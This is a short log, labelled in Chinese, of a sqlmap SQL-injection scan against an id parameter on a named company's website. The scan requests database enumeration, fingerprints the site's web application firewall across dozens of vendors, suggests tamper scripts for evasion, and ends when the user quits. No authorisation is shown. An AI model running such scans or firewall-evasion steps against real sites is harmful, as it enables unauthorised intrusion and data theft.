命令
sqlmap.py -u "http://www.samilsys.com/project_detail.php?id=12" -v3 --dbs
测试结果
[09:23:36] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[09:23:52] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
[09:23:52] [DEBUG] loading WAF script '360'
[09:23:52] [DEBUG] loading WAF script 'airlock'
[09:23:52] [DEBUG] loading WAF script 'anquanbao'
[09:23:52] [DEBUG] loading WAF script 'armor'
[09:23:52] [DEBUG] loading WAF script 'aws'
[09:23:52] [DEBUG] loading WAF script 'baidu'
[09:23:52] [DEBUG] loading WAF script 'barracuda'
[09:23:52] [DEBUG] loading WAF script 'bigip'
[09:23:52] [DEBUG] loading WAF script 'binarysec'
[09:23:52] [DEBUG] loading WAF script 'blockdos'
[09:23:52] [DEBUG] loading WAF script 'ciscoacexml'
[09:23:52] [DEBUG] loading WAF script 'cloudflare'
[09:23:52] [DEBUG] loading WAF script 'cloudfront'
[09:23:52] [DEBUG] loading WAF script 'comodo'
[09:23:52] [DEBUG] loading WAF script 'datapower'
[09:23:52] [DEBUG] loading WAF script 'denyall'
[09:23:52] [DEBUG] loading WAF script 'dotdefender'
[09:23:52] [DEBUG] loading WAF script 'edgecast'
[09:23:52] [DEBUG] loading WAF script 'expressionengine'
[09:23:52] [DEBUG] loading WAF script 'fortiweb'
[09:23:52] [DEBUG] loading WAF script 'generic'
[09:23:52] [DEBUG] loading WAF script 'hyperguard'
[09:23:52] [DEBUG] loading WAF script 'incapsula'
[09:23:52] [DEBUG] loading WAF script 'isaserver'
[09:23:52] [DEBUG] loading WAF script 'jiasule'
[09:23:52] [DEBUG] loading WAF script 'knownsec'
[09:23:52] [DEBUG] loading WAF script 'kona'
[09:23:52] [DEBUG] loading WAF script 'modsecurity'
[09:23:52] [DEBUG] loading WAF script 'netcontinuum'
[09:23:52] [DEBUG] loading WAF script 'netscaler'
[09:23:52] [DEBUG] loading WAF script 'newdefend'
[09:23:52] [DEBUG] loading WAF script 'nsfocus'
[09:23:52] [DEBUG] loading WAF script 'paloalto'
[09:23:52] [DEBUG] loading WAF script 'profense'
[09:23:52] [DEBUG] loading WAF script 'proventia'
[09:23:52] [DEBUG] loading WAF script 'radware'
[09:23:52] [DEBUG] loading WAF script 'requestvalidationmode'
[09:23:52] [DEBUG] loading WAF script 'safe3'
[09:23:52] [DEBUG] loading WAF script 'safedog'
[09:23:52] [DEBUG] loading WAF script 'secureiis'
[09:23:52] [DEBUG] loading WAF script 'senginx'
[09:23:52] [DEBUG] loading WAF script 'sitelock'
[09:23:52] [DEBUG] loading WAF script 'sonicwall'
[09:23:52] [DEBUG] loading WAF script 'sophos'
[09:23:52] [DEBUG] loading WAF script 'stingray'
[09:23:52] [DEBUG] loading WAF script 'sucuri'
[09:23:52] [DEBUG] loading WAF script 'tencent'
[09:23:52] [DEBUG] loading WAF script 'teros'
[09:23:52] [DEBUG] loading WAF script 'trafficshield'
[09:23:52] [DEBUG] loading WAF script 'urlscan'
[09:23:52] [DEBUG] loading WAF script 'uspses'
[09:23:52] [DEBUG] loading WAF script 'varnish'
[09:23:52] [DEBUG] loading WAF script 'wallarm'
[09:23:52] [DEBUG] loading WAF script 'webappsecure'
[09:23:52] [DEBUG] loading WAF script 'webknight'
[09:23:52] [DEBUG] loading WAF script 'yundun'
[09:23:52] [DEBUG] loading WAF script 'yunsuo'
[09:23:52] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewall (360)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application Firewall (Anquanbao)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Defense)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web Application Firewall (Amazon)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Firewall (Baidu)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security Manager (F5 Networks)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application Firewall (BinarySEC)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisco Systems)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application Firewall (CloudFlare)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Firewall (Comodo)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IBM)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Firewall (DenyAll)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Technologies)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Firewall (Fortinet)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application Firewall (art of defence)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Firewall (Jiasule)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Akamai Technologies)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application Firewall (Newdefend)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Firewall (NSFOCUS)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Alto Networks)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Firewall (Armorlogic)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application Security (IBM)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMode (Microsoft)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firewall'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Firewall (Safedog)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Security (BeyondTrust)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporation)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application Firewall (SiteLock)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewall (Riverbed / Brocade)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall (Sucuri)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Application Firewall (Tencent Cloud Computing)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (United Security Providers)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP) '
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Firewall (Wallarm)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firewall (AQTRONIX)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Firewall (Yundun)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Firewall (Yunsuo)'
[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
[09:23:52] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
are you sure that you want to continue with further target testing? [y/N] y
[09:23:56] [WARNING] please consider usage of tamper scripts (option '--tamper')
[09:23:56] [ERROR] user quit